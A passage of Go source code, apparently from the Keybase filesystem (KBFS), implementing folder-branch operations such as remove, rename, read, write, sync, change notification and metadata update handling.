md.ReadOnly(), dirPath, blockRead) de, ok := pblock.Children[dirName] if !ok { return NoSuchNameError{dirName} } // construct a path for the child so we can check for an empty dir childPath := dirPath.ChildPath(dirName, de.BlockPointer) childBlock, err := fbo.blocks.GetDir( ctx, lState, md.ReadOnly(), childPath, blockRead) if isRecoverableBlockErrorForRemoval(err) { msg := fmt.Sprintf("Recoverable block error encountered for removeDirLocked(%v); continuing", childPath) fbo.log.CWarningf(ctx, "%s", msg) fbo.log.CDebugf(ctx, "%s (err=%v)", msg, err) } else if err != nil { return err } else if len(childBlock.Children) > 0 { return DirNotEmptyError{dirName} } return fbo.removeEntryLocked(ctx, lState, md, dirPath, dirName) } func (fbo *folderBranchOps) RemoveDir( ctx context.Context, dir Node, dirName string) (err error) { fbo.log.CDebugf(ctx, "RemoveDir %p %s", dir.GetID(), dirName) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(dir) if err != nil { return } return fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { return fbo.removeDirLocked(ctx, lState, dir, dirName) }) } func (fbo *folderBranchOps) RemoveEntry(ctx context.Context, dir Node, name string) (err error) { fbo.log.CDebugf(ctx, "RemoveEntry %p %s", dir.GetID(), name) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(dir) if err != nil { return err } return fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { // verify we have permission to write md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return err } dirPath, err := fbo.pathFromNodeForMDWriteLocked(lState, dir) if err != nil { return err } return fbo.removeEntryLocked(ctx, lState, md, dirPath, name) }) } func (fbo *folderBranchOps) renameLocked( ctx context.Context, lState *lockState, oldParent path, oldName string, newParent path, newName string) (err error) { fbo.mdWriterLock.AssertLocked(lState) // verify we have permission to write md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return err } oldPBlock, newPBlock, newDe, lbc, err := fbo.blocks.PrepRename( ctx, lState, md, oldParent, oldName, newParent, newName) if err != nil { return err } // does name exist? if de, ok := newPBlock.Children[newName]; ok { // Usually higher-level programs check these, but just in case. if de.Type == Dir && newDe.Type != Dir { return NotDirError{newParent.ChildPathNoPtr(newName)} } else if de.Type != Dir && newDe.Type == Dir { return NotFileError{newParent.ChildPathNoPtr(newName)} } if de.Type == Dir { // The directory must be empty. oldTargetDir, err := fbo.blocks.GetDirBlockForReading(ctx, lState, md.ReadOnly(), de.BlockPointer, newParent.Branch, newParent.ChildPathNoPtr(newName)) if err != nil { return err } if len(oldTargetDir.Children) != 0 { fbo.log.CWarningf(ctx, "Renaming over a non-empty directory "+ " (%s/%s) not allowed.", newParent, newName) return DirNotEmptyError{newName} } } // Delete the old block pointed to by this direntry. err := fbo.unrefEntry(ctx, lState, md, newParent, de, newName) if err != nil { return err } } // only the ctime changes newDe.Ctime = fbo.nowUnixNano() newPBlock.Children[newName] = newDe delete(oldPBlock.Children, oldName) // find the common ancestor var i int found := false // the root block will always be the same, so start at number 1 for i = 1; i < len(oldParent.path) && i < len(newParent.path); i++ { if oldParent.path[i].ID != newParent.path[i].ID { found = true i-- break } } if !found { // if we couldn't find one, then the common ancestor is the // last node in the shorter path if len(oldParent.path) < len(newParent.path) { i = len(oldParent.path) - 1 } else { i = len(newParent.path) - 1 } } commonAncestor := oldParent.path[i].BlockPointer oldIsCommon := oldParent.tailPointer() == commonAncestor newIsCommon := newParent.tailPointer() == commonAncestor newOldPath := path{FolderBranch: oldParent.FolderBranch} var oldBps *blockPutState if oldIsCommon { if newIsCommon { // if old and new are both the common ancestor, there is // nothing to do (syncBlock will take care of everything) } else { // If the old one is common and the new one is // not, then the last // syncBlockAndCheckEmbedLocked call will need // to access the old one. lbc[oldParent.tailPointer()] = oldPBlock } } else { if newIsCommon { // If the new one is common, then the first // syncBlockAndCheckEmbedLocked call will need to access // it. lbc[newParent.tailPointer()] = newPBlock } // The old one is not the common ancestor, so we need to sync it. // TODO: optimize by pushing blocks from both paths in parallel newOldPath, _, oldBps, err = fbo.syncBlockAndCheckEmbedLocked( ctx, lState, md, oldPBlock, *oldParent.parentPath(), oldParent.tailName(), Dir, true, true, commonAncestor, lbc) if err != nil { return err } } newNewPath, _, newBps, err := fbo.syncBlockAndCheckEmbedLocked( ctx, lState, md, newPBlock, *newParent.parentPath(), newParent.tailName(), Dir, true, true, zeroPtr, lbc) if err != nil { return err } // newOldPath is really just a prefix now. A copy is necessary as an // append could cause the new path to contain nodes from the old path. newOldPath.path = append(make([]pathNode, i+1, i+1), newOldPath.path...) copy(newOldPath.path[:i+1], newNewPath.path[:i+1]) // merge and finalize the blockPutStates if oldBps != nil { newBps.mergeOtherBps(oldBps) } defer func() { if err != nil { fbo.fbm.cleanUpBlockState( md.ReadOnly(), newBps, blockDeleteOnMDFail) } }() _, err = doBlockPuts(ctx, fbo.config.BlockServer(), fbo.config.BlockCache(), fbo.config.Reporter(), fbo.log, md.TlfID(), md.GetTlfHandle().GetCanonicalName(), *newBps) if err != nil { return err } return fbo.finalizeMDWriteLocked(ctx, lState, md, newBps, NoExcl) } func (fbo *folderBranchOps) Rename( ctx context.Context, oldParent Node, oldName string, newParent Node, newName string) (err error) { fbo.log.CDebugf(ctx, "Rename %p/%s -> %p/%s", oldParent.GetID(), oldName, newParent.GetID(), newName) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(newParent) if err != nil { return err } return fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { oldParentPath, err := fbo.pathFromNodeForMDWriteLocked(lState, oldParent) if err != nil { return err } newParentPath, err := fbo.pathFromNodeForMDWriteLocked(lState, newParent) if err != nil { return err } // only works for paths within the same topdir if oldParentPath.FolderBranch != newParentPath.FolderBranch { return RenameAcrossDirsError{} } return fbo.renameLocked(ctx, lState, oldParentPath, oldName, newParentPath, newName) }) } func (fbo *folderBranchOps) Read( ctx context.Context, file Node, dest []byte, off int64) ( n int64, err error) { fbo.log.CDebugf(ctx, "Read %p %d %d", file.GetID(), len(dest), off) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(file) if err != nil { return 0, err } filePath, err := fbo.pathFromNodeForRead(file) if err != nil { return 0, err } { // It seems git isn't handling EINTR from some of its read calls (likely // fread), which causes it to get corrupted data (which leads to coredumps // later) when a read system call on pack files gets interrupted. This // enables delayed cancellation for Read if the file path contains `.git`. // // TODO: get a patch in git, wait for sufficiently long time for people to // upgrade, and remove this. // allow turning this feature off by env var to make life easier when we // try to fix git. if _, isSet := os.LookupEnv("KBFS_DISABLE_GIT_SPECIAL_CASE"); !isSet { for _, n := range filePath.path { if n.Name == ".git" { EnableDelayedCancellationWithGracePeriod(ctx, fbo.config.DelayedCancellationGracePeriod()) break } } } } // Don't let the goroutine below write directly to the return // variable, since if the context is canceled the goroutine might // outlast this function call, and end up in a read/write race // with the caller. var bytesRead int64 err = runUnlessCanceled(ctx, func() error { lState := makeFBOLockState() // verify we have permission to read md, err := fbo.getMDForReadNeedIdentify(ctx, lState) if err != nil { return err } bytesRead, err = fbo.blocks.Read( ctx, lState, md.ReadOnly(), filePath, dest, off) return err }) if err != nil { return 0, err } return bytesRead, nil } func (fbo *folderBranchOps) Write( ctx context.Context, file Node, data []byte, off int64) (err error) { fbo.log.CDebugf(ctx, "Write %p %d %d", file.GetID(), len(data), off) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(file) if err != nil { return err } return runUnlessCanceled(ctx, func() error { lState := makeFBOLockState() // Get the MD for reading. We won't modify it; we'll track the // unref changes on the side, and put them into the MD during the // sync. md, err := fbo.getMDLocked(ctx, lState, mdReadNeedIdentify) if err != nil { return err } err = fbo.blocks.Write( ctx, lState, md.ReadOnly(), file, data, off) if err != nil { return err } fbo.status.addDirtyNode(file) return nil }) } func (fbo *folderBranchOps) Truncate( ctx context.Context, file Node, size uint64) (err error) { fbo.log.CDebugf(ctx, "Truncate %p %d", file.GetID(), size) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(file) if err != nil { return err } return runUnlessCanceled(ctx, func() error { lState := makeFBOLockState() // Get the MD for reading. We won't modify it; we'll track the // unref changes on the side, and put them into the MD during the // sync. md, err := fbo.getMDLocked(ctx, lState, mdReadNeedIdentify) if err != nil { return err } err = fbo.blocks.Truncate( ctx, lState, md.ReadOnly(), file, size) if err != nil { return err } fbo.status.addDirtyNode(file) return nil }) } func (fbo *folderBranchOps) setExLocked( ctx context.Context, lState *lockState, file path, ex bool) (err error) { fbo.mdWriterLock.AssertLocked(lState) // verify we have permission to write md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return } dblock, de, err := fbo.blocks.GetDirtyParentAndEntry( ctx, lState, md.ReadOnly(), file) if err != nil { return err } // If the file is a symlink, do nothing (to match ext4 // behavior). if de.Type == Sym || de.Type == Dir { fbo.log.CDebugf(ctx, "Ignoring setex on type %s", de.Type) return nil } if ex && (de.Type == File) { de.Type = Exec } else if !ex && (de.Type == Exec) { de.Type = File } else { // Treating this as a no-op, without updating the ctime, is a // POSIX violation, but it's an important optimization to keep // permissions-preserving rsyncs fast. fbo.log.CDebugf(ctx, "Ignoring no-op setex") return nil } de.Ctime = fbo.nowUnixNano() parentPath := file.parentPath() sao, err := newSetAttrOp(file.tailName(), parentPath.tailPointer(), exAttr, file.tailPointer()) if err != nil { return err } // If the MD doesn't match the MD expected by the path, that // implies we are using a cached path, which implies the node has // been unlinked. In that case, we can safely ignore this setex. if md.data.Dir.BlockPointer != file.path[0].BlockPointer { fbo.log.CDebugf(ctx, "Skipping setex for a removed file %v", file.tailPointer()) fbo.blocks.UpdateCachedEntryAttributesOnRemovedFile( ctx, lState, sao, de) return nil } md.AddOp(sao) dblock.Children[file.tailName()] = de _, err = fbo.syncBlockAndFinalizeLocked( ctx, lState, md, dblock, *parentPath.parentPath(), parentPath.tailName(), Dir, false, false, zeroPtr, NoExcl) return err } func (fbo *folderBranchOps) SetEx( ctx context.Context, file Node, ex bool) (err error) { fbo.log.CDebugf(ctx, "SetEx %p %t", file.GetID(), ex) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(file) if err != nil { return } return fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { filePath, err := fbo.pathFromNodeForMDWriteLocked(lState, file) if err != nil { return err } return fbo.setExLocked(ctx, lState, filePath, ex) }) } func (fbo *folderBranchOps) setMtimeLocked( ctx context.Context, lState *lockState, file path, mtime *time.Time) error { fbo.mdWriterLock.AssertLocked(lState) // verify we have permission to write md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return err } dblock, de, err := fbo.blocks.GetDirtyParentAndEntry( ctx, lState, md.ReadOnly(), file) if err != nil { return err } de.Mtime = mtime.UnixNano() // setting the mtime counts as changing the file MD, so must set ctime too de.Ctime = fbo.nowUnixNano() parentPath := file.parentPath() sao, err := newSetAttrOp(file.tailName(), parentPath.tailPointer(), mtimeAttr, file.tailPointer()) if err != nil { return err } // If the MD doesn't match the MD expected by the path, that // implies we are using a cached path, which implies the node has // been unlinked. In that case, we can safely ignore this // setmtime. if md.data.Dir.BlockPointer != file.path[0].BlockPointer { fbo.log.CDebugf(ctx, "Skipping setmtime for a removed file %v", file.tailPointer()) fbo.blocks.UpdateCachedEntryAttributesOnRemovedFile( ctx, lState, sao, de) return nil } md.AddOp(sao) dblock.Children[file.tailName()] = de _, err = fbo.syncBlockAndFinalizeLocked( ctx, lState, md, dblock, *parentPath.parentPath(), parentPath.tailName(), Dir, false, false, zeroPtr, NoExcl) return err } func (fbo *folderBranchOps) SetMtime( ctx context.Context, file Node, mtime *time.Time) (err error) { fbo.log.CDebugf(ctx, "SetMtime %p %v", file.GetID(), mtime) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() if mtime == nil { // Can happen on some OSes (e.g. OSX) when trying to set the atime only return nil } err = fbo.checkNode(file) if err != nil { return } return fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { filePath, err := fbo.pathFromNodeForMDWriteLocked(lState, file) if err != nil { return err } return fbo.setMtimeLocked(ctx, lState, filePath, mtime) }) } func (fbo *folderBranchOps) syncLocked(ctx context.Context, lState *lockState, file path) (stillDirty bool, err error) { fbo.mdWriterLock.AssertLocked(lState) // if the cache for this file isn't dirty, we're done if !fbo.blocks.IsDirty(lState, file) { return false, nil } // Verify we have permission to write. We do this after the dirty // check because otherwise readers who sync clean files on close // would get an error. md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return true, err } // If the MD doesn't match the MD expected by the path, that // implies we are using a cached path, which implies the node has // been unlinked. In that case, we can safely ignore this sync. if md.data.Dir.BlockPointer != file.path[0].BlockPointer { fbo.log.CDebugf(ctx, "Skipping sync for a removed file %v", file.tailPointer()) // Removing the cached info here is a little sketchy, // since there's no guarantee that this sync comes // from closing the file, and we still want to serve // stat calls accurately if the user still has an open // handle to this file. TODO: Hook this in with the // node cache GC logic to be perfectly accurate. return true, fbo.blocks.ClearCacheInfo(lState, file) } _, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return true, err } // notify the daemon that a write is being performed fbo.config.Reporter().Notify(ctx, writeNotification(file, false)) defer fbo.config.Reporter().Notify(ctx, writeNotification(file, true)) // Filled in by doBlockPuts below. var blocksToRemove []BlockPointer fblock, bps, lbc, syncState, err := fbo.blocks.StartSync(ctx, lState, md, uid, file) defer func() { fbo.blocks.CleanupSyncState( ctx, lState, md.ReadOnly(), file, blocksToRemove, syncState, err) }() if err != nil { return true, err } newPath, _, newBps, err := fbo.syncBlockAndCheckEmbedLocked( ctx, lState, md, fblock, *file.parentPath(), file.tailName(), File, true, true, zeroPtr, lbc) if err != nil { return true, err } bps.mergeOtherBps(newBps) // Note: We explicitly don't call fbo.fbm.cleanUpBlockState here // when there's an error, because it's possible some of the blocks // will be reused in a future attempt at this same sync, and we // don't want them cleaned up in that case. Instead, the // FinishSync call below will take care of that. blocksToRemove, err = doBlockPuts(ctx, fbo.config.BlockServer(), fbo.config.BlockCache(), fbo.config.Reporter(), fbo.log, md.TlfID(), md.GetTlfHandle().GetCanonicalName(), *bps) if err != nil { return true, err } err = fbo.finalizeMDWriteLocked(ctx, lState, md, bps, NoExcl) if err != nil { return true, err } // At this point, all reads through the old path (i.e., file) // see writes that happened since StartSync, whereas all reads // through the new path (newPath) don't. // // TODO: This isn't completely correct, since reads that // happen after a write should always see the new data. // // After FinishSync succeeds, then reads through both the old // and the new paths will see the writes that happened during // the sync. return fbo.blocks.FinishSync(ctx, lState, file, newPath, md.ReadOnly(), syncState, fbo.fbm) } func (fbo *folderBranchOps) Sync(ctx context.Context, file Node) (err error) { fbo.log.CDebugf(ctx, "Sync %p", file.GetID()) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(file) if err != nil { return } var stillDirty bool err = fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { filePath, err := fbo.pathFromNodeForMDWriteLocked(lState, file) if err != nil { return err } stillDirty, err = fbo.syncLocked(ctx, lState, filePath) return err }) if err != nil { return err } if !stillDirty { fbo.status.rmDirtyNode(file) } return nil } func (fbo *folderBranchOps) FolderStatus( ctx context.Context, folderBranch FolderBranch) ( fbs FolderBranchStatus, updateChan <-chan StatusUpdate, err error) { fbo.log.CDebugf(ctx, "Status") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() if folderBranch != fbo.folderBranch { return FolderBranchStatus{}, nil, WrongOpsError{fbo.folderBranch, folderBranch} } return fbo.status.getStatus(ctx) } func (fbo *folderBranchOps) Status( ctx context.Context) ( fbs KBFSStatus, updateChan <-chan StatusUpdate, err error) { return KBFSStatus{}, nil, InvalidOpError{} } // RegisterForChanges registers a single Observer to receive // notifications about this folder/branch. func (fbo *folderBranchOps) RegisterForChanges(obs Observer) error { // It's the caller's responsibility to make sure // RegisterForChanges isn't called twice for the same Observer fbo.observers.add(obs) return nil } // UnregisterFromChanges stops an Observer from getting notifications // about the folder/branch. func (fbo *folderBranchOps) UnregisterFromChanges(obs Observer) error { fbo.observers.remove(obs) return nil } // notifyBatchLocked sends out a notification for the most recent op // in md. func (fbo *folderBranchOps) notifyBatchLocked( ctx context.Context, lState *lockState, md ImmutableRootMetadata) { fbo.headLock.AssertLocked(lState) lastOp := md.data.Changes.Ops[len(md.data.Changes.Ops)-1] fbo.notifyOneOpLocked(ctx, lState, lastOp, md) fbo.editHistory.UpdateHistory(ctx, []ImmutableRootMetadata{md}) } // searchForNode tries to figure out the path to the given // blockPointer, using only the block updates that happened as part of // a given MD update operation. func (fbo *folderBranchOps) searchForNode(ctx context.Context, ptr BlockPointer, md ReadOnlyRootMetadata) (Node, error) { // Record which pointers are new to this update, and thus worth // searching. newPtrs := make(map[BlockPointer]bool) for _, op := range md.data.Changes.Ops { for _, update := range op.AllUpdates() { newPtrs[update.Ref] = true } for _, ref := range op.Refs() { newPtrs[ref] = true } } nodeMap, _, err := fbo.blocks.SearchForNodes(ctx, fbo.nodeCache, []BlockPointer{ptr}, newPtrs, md) if err != nil { return nil, err } n, ok := nodeMap[ptr] if !ok { return nil, NodeNotFoundError{ptr} } return n, nil } func (fbo *folderBranchOps) unlinkFromCache(op op, oldDir BlockPointer, node Node, name string) error { // The entry could be under any one of the unref'd blocks, and // it's safe to perform this when the pointer isn't real, so just // try them all to avoid the overhead of looking up the right // pointer in the old version of the block. p, err := fbo.pathFromNodeForRead(node) if err != nil { return err } childPath := p.ChildPathNoPtr(name) // revert the parent pointer childPath.path[len(childPath.path)-2].BlockPointer = oldDir for _, ptr := range op.Unrefs() { childPath.path[len(childPath.path)-1].BlockPointer = ptr fbo.nodeCache.Unlink(ptr.ref(), childPath) } return nil } func (fbo *folderBranchOps) notifyOneOpLocked(ctx context.Context, lState *lockState, op op, md ImmutableRootMetadata) { fbo.headLock.AssertLocked(lState) fbo.blocks.UpdatePointers(lState, op) var changes []NodeChange switch realOp := op.(type) { default: return case *createOp: node := fbo.nodeCache.Get(realOp.Dir.Ref.ref()) if node == nil { return } fbo.log.CDebugf(ctx, "notifyOneOp: create %s in node %p", realOp.NewName, node.GetID()) changes = append(changes, NodeChange{ Node: node, DirUpdated: []string{realOp.NewName}, }) case *rmOp: node := fbo.nodeCache.Get(realOp.Dir.Ref.ref()) if node == nil { return } fbo.log.CDebugf(ctx, "notifyOneOp: remove %s in node %p", realOp.OldName, node.GetID()) changes = append(changes, NodeChange{ Node: node, DirUpdated: []string{realOp.OldName}, }) // If this node exists, then the child node might exist too, // and we need to unlink it in the node cache. err := fbo.unlinkFromCache(op, realOp.Dir.Unref, node, realOp.OldName) if err != nil { fbo.log.CErrorf(ctx, "Couldn't unlink from cache: %v", err) return } case *renameOp: oldNode := fbo.nodeCache.Get(realOp.OldDir.Ref.ref()) if oldNode != nil { changes = append(changes, NodeChange{ Node: oldNode, DirUpdated: []string{realOp.OldName}, }) } var newNode Node if realOp.NewDir.Ref != zeroPtr { newNode = fbo.nodeCache.Get(realOp.NewDir.Ref.ref()) if newNode != nil { changes = append(changes, NodeChange{ Node: newNode, DirUpdated: []string{realOp.NewName}, }) } } else { newNode = oldNode if oldNode != nil { // Add another name to the existing NodeChange. changes[len(changes)-1].DirUpdated = append(changes[len(changes)-1].DirUpdated, realOp.NewName) } } if oldNode != nil { var newNodeID NodeID if newNode != nil { newNodeID = newNode.GetID() } fbo.log.CDebugf(ctx, "notifyOneOp: rename %v from %s/%p to %s/%p", realOp.Renamed, realOp.OldName, oldNode.GetID(), realOp.NewName, newNodeID) if newNode == nil { if childNode := fbo.nodeCache.Get(realOp.Renamed.ref()); childNode != nil { // if the childNode exists, we still have to update // its path to go through the new node. That means // creating nodes for all the intervening paths. // Unfortunately we don't have enough information to // know what the newPath is; we have to guess it from // the updates. var err error newNode, err = fbo.searchForNode(ctx, realOp.NewDir.Ref, md.ReadOnly()) if newNode == nil { fbo.log.CErrorf(ctx, "Couldn't find the new node: %v", err) } } } if newNode != nil { // If new node exists as well, unlink any previously // existing entry and move the node. var unrefPtr BlockPointer if oldNode != newNode { unrefPtr = realOp.NewDir.Unref } else { unrefPtr = realOp.OldDir.Unref } err := fbo.unlinkFromCache(op, unrefPtr, newNode, realOp.NewName) if err != nil { fbo.log.CErrorf(ctx, "Couldn't unlink from cache: %v", err) return } err = fbo.nodeCache.Move(realOp.Renamed.ref(), newNode, realOp.NewName) if err != nil { fbo.log.CErrorf(ctx, "Couldn't move node in cache: %v", err) return } } } case *syncOp: node := fbo.nodeCache.Get(realOp.File.Ref.ref()) if node == nil { return } fbo.log.CDebugf(ctx, "notifyOneOp: sync %d writes in node %p", len(realOp.Writes), node.GetID()) changes = append(changes, NodeChange{ Node: node, FileUpdated: realOp.Writes, }) case *setAttrOp: node := fbo.nodeCache.Get(realOp.Dir.Ref.ref()) if node == nil { return } fbo.log.CDebugf(ctx, "notifyOneOp: setAttr %s for file %s in node %p", realOp.Attr, realOp.Name, node.GetID()) p, err := fbo.pathFromNodeForRead(node) if err != nil { return } childNode, err := fbo.blocks.UpdateCachedEntryAttributes( ctx, lState, md.ReadOnly(), p, realOp) if err != nil { // TODO: Log error? return } if childNode == nil { return } changes = append(changes, NodeChange{ Node: childNode, }) case *gcOp: // Unreferenced blocks in a gcOp mean that we shouldn't cache // them anymore bcache := fbo.config.BlockCache() for _, ptr := range realOp.Unrefs() { if err := bcache.DeleteTransient(ptr, fbo.id()); err != nil { fbo.log.CDebugf(ctx, "Couldn't delete transient entry for %v: %v", ptr, err) } } case *resolutionOp: // If there are any unrefs of blocks that have a node, this is an // implied rmOp (see KBFS-1424). reverseUpdates := make(map[BlockPointer]BlockPointer) for _, unref := range op.Unrefs() { // TODO: I will add logic here to unlink and invalidate any // corresponding unref'd nodes. node := fbo.nodeCache.Get(unref.ref()) if node == nil { // TODO: even if we don't have the node that was // unreferenced, we might have its parent, and that // parent might need an invalidation. continue } // If there is a node, unlink and invalidate. p, err := fbo.pathFromNodeForRead(node) if err != nil { fbo.log.CErrorf(ctx, "Couldn't get path: %v", err) continue } if !p.hasValidParent() { fbo.log.CErrorf(ctx, "Removed node %s has no parent", p) continue } parentPath := p.parentPath() parentNode := fbo.nodeCache.Get(parentPath.tailPointer().ref()) if parentNode != nil { changes = append(changes, NodeChange{ Node: parentNode, DirUpdated: []string{p.tailName()}, }) } fbo.log.CDebugf(ctx, "resolutionOp: remove %s, node %p", p.tailPointer(), node.GetID()) // Revert the path back to the original BlockPointers, // before the updates were applied. if len(reverseUpdates) == 0 { for _, update := range op.AllUpdates() { reverseUpdates[update.Ref] = update.Unref } } for i, pNode := range p.path { if oldPtr, ok := reverseUpdates[pNode.BlockPointer]; ok { p.path[i].BlockPointer = oldPtr } } fbo.nodeCache.Unlink(p.tailPointer().ref(), p) } if len(changes) == 0 { return } } fbo.observers.batchChanges(ctx, changes) } func (fbo *folderBranchOps) getCurrMDRevisionLocked(lState *lockState) MetadataRevision { fbo.headLock.AssertAnyLocked(lState) if fbo.head != (ImmutableRootMetadata{}) { return fbo.head.Revision() } return MetadataRevisionUninitialized } func (fbo *folderBranchOps) getCurrMDRevision( lState *lockState) MetadataRevision { fbo.headLock.RLock(lState) defer fbo.headLock.RUnlock(lState) return fbo.getCurrMDRevisionLocked(lState) } type applyMDUpdatesFunc func(context.Context, *lockState, []ImmutableRootMetadata) error func (fbo *folderBranchOps) applyMDUpdatesLocked(ctx context.Context, lState *lockState, rmds []ImmutableRootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) // if we have staged changes, ignore all updates until conflict // resolution kicks in. TODO: cache these for future use. if !fbo.isMasterBranchLocked(lState) { if len(rmds) > 0 { // setHeadLocked takes care of merged case fbo.setLatestMergedRevisionLocked(ctx, lState, rmds[len(rmds)-1].Revision(), false) unmergedRev := MetadataRevisionUninitialized if fbo.head != (ImmutableRootMetadata{}) { unmergedRev = fbo.head.Revision() } fbo.cr.Resolve(unmergedRev, rmds[len(rmds)-1].Revision()) } return UnmergedError{} } // Don't allow updates while we're in the dirty state; the next // sync will put us into an unmerged state anyway and we'll // require conflict resolution. if fbo.blocks.GetState(lState) != cleanState { return errors.New("Ignoring MD updates while writes are dirty") } appliedRevs := make([]ImmutableRootMetadata, 0, len(rmds)) for _, rmd := range rmds { // check that we're applying the expected MD revision if rmd.Revision() <= fbo.getCurrMDRevisionLocked(lState) { // Already caught up! continue } if err := isReadableOrError(ctx, fbo.config, rmd.ReadOnly()); err != nil { return err } err := fbo.setHeadSuccessorLocked(ctx, lState, rmd, false) if err != nil { return err } // No new operations in these. if rmd.IsWriterMetadataCopiedSet() { continue } for _, op := range rmd.data.Changes.Ops { fbo.notifyOneOpLocked(ctx, lState, op, rmd) } appliedRevs = append(appliedRevs, rmd) } if len(appliedRevs) > 0 { fbo.editHistory.UpdateHistory(ctx, appliedRevs) } return nil } func (fbo *folderBranchOps) undoMDUpdatesLocked(ctx context.Context, lState *lockState, rmds []ImmutableRootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) // Don't allow updates while we're in the dirty state; the next // sync will put us into an unmerged state anyway and we'll // require conflict resolution. if fbo.blocks.GetState(lState) != cleanState { return NotPermittedWhileDirtyError{} } // go backwards through the updates for i := len(rmds) - 1; i >= 0; i-- { rmd := rmds[i] // on undo, it's ok to re-apply the current revision since you // need to invert all of its ops. // // This duplicates a check in // fbo.setHeadPredecessorLocked. TODO: Remove this // duplication. if rmd.Revision() != fbo.getCurrMDRevisionLocked(lState) && rmd.Revision() != fbo.getCurrMDRevisionLocked(lState)-1 { return MDUpdateInvertError{rmd.Revision(), fbo.getCurrMDRevisionLocked(lState)} } // TODO: Check that the revisions are equal only for // the first iteration. if rmd.Revision() < fbo.getCurrMDRevisionLocked(lState) { err := fbo.setHeadPredecessorLocked(ctx, lState, rmd) if err != nil { return err } } // iterate the ops in reverse and invert each one ops := rmd.data.Changes.Ops for j := len(ops) - 1; j >= 0; j-- { io, err := invertOpForLocalNotifications(ops[j]) if err != nil { fbo.log.CWarningf(ctx, "got error %v when invert op %v; "+ "skipping. Open file handles "+ "may now be in an invalid "+ "state, which can be fixed by "+ "either closing them all or "+ "restarting KBFS.", err, ops[j]) continue } fbo.notifyOneOpLocked(ctx, lState, io, rmd) } } // TODO: update the edit history? return nil } func (fbo *folderBranchOps) applyMDUpdates(ctx context.Context, lState *lockState, rmds []ImmutableRootMetadata) error { fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) return fbo.applyMDUpdatesLocked(ctx, lState, rmds) } func (fbo *folderBranchOps) getLatestMergedRevision(lState *lockState) MetadataRevision { fbo.headLock.RLock(lState) defer fbo.headLock.RUnlock(lState) return fbo.latestMergedRevision } // caller should have held fbo.headLock func (fbo *folderBranchOps) setLatestMergedRevisionLocked(ctx context.Context, lState *lockState, rev MetadataRevision, allowBackward bool) { fbo.headLock.AssertLocked(lState) if fbo.latestMergedRevision < rev || allowBackward { fbo.latestMergedRevision = rev fbo.log.CDebugf(ctx, "Updated latestMergedRevision to %d.", rev) } else { fbo.log.CDebugf(ctx, "Local latestMergedRevision (%d) is higher than "+ "the new revision (%d); won't update.", fbo.latestMergedRevision, rev) } } // Assumes all necessary locking is either already done by caller, or // is done by applyFunc. func (fbo *folderBranchOps) getAndApplyMDUpdates(ctx context.Context, lState *lockState, applyFunc applyMDUpdatesFunc) error { // first look up all MD revisions newer than my current head start := fbo.getLatestMergedRevision(lState) + 1 rmds, err := getMergedMDUpdates(ctx, fbo.config, fbo.id(), start) if err != nil { return err } err = applyFunc(ctx, lState, rmds) if err != nil { return err } return nil } func (fbo *folderBranchOps) getAndApplyNewestUnmergedHead(ctx context.Context, lState *lockState) error { fbo.log.CDebugf(ctx, "Fetching the newest unmerged head") bid := func() BranchID { fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) return fbo.bid }() // We can only ever be at most one revision behind, so fetch the // latest unmerged revision and apply it as a successor. md, err := fbo.config.MDOps().GetUnmergedForTLF(ctx, fbo.id(), bid) if err != nil { return err } if md == (ImmutableRootMetadata{}) { // There is no unmerged revision, oops! return errors.New("Couldn't find an unmerged head") } fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) if fbo.bid != bid { // The branches switched (apparently CR completed), so just // try again. fbo.log.CDebugf(ctx, "Branches switched while fetching unmerged head") return nil } fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) if err := fbo.setHeadSuccessorLocked(ctx, lState, md, false); err != nil { return err } fbo.notifyBatchLocked(ctx, lState, md) if err := fbo.config.MDCache().Put(md); err != nil { return err } return nil } // getUnmergedMDUpdates returns a slice of the unmerged MDs for this // TLF's current unmerged branch and unmerged branch, between the // merge point for the branch and the current head. The returned MDs // are the same instances that are stored in the MD cache, so they // should be modified with care. func (fbo *folderBranchOps) getUnmergedMDUpdates( ctx context.Context, lState *lockState) ( MetadataRevision, []ImmutableRootMetadata, error) { // acquire mdWriterLock to read the current branch ID. bid := func() BranchID { fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) return fbo.bid }() return getUnmergedMDUpdates(ctx, fbo.config, fbo.id(), bid, fbo.getCurrMDRevision(lState)) } func (fbo *folderBranchOps) getUnmergedMDUpdatesLocked( ctx context.Context, lState *lockState) ( MetadataRevision, []ImmutableRootMetadata, error) { fbo.mdWriterLock.AssertLocked(lState) return 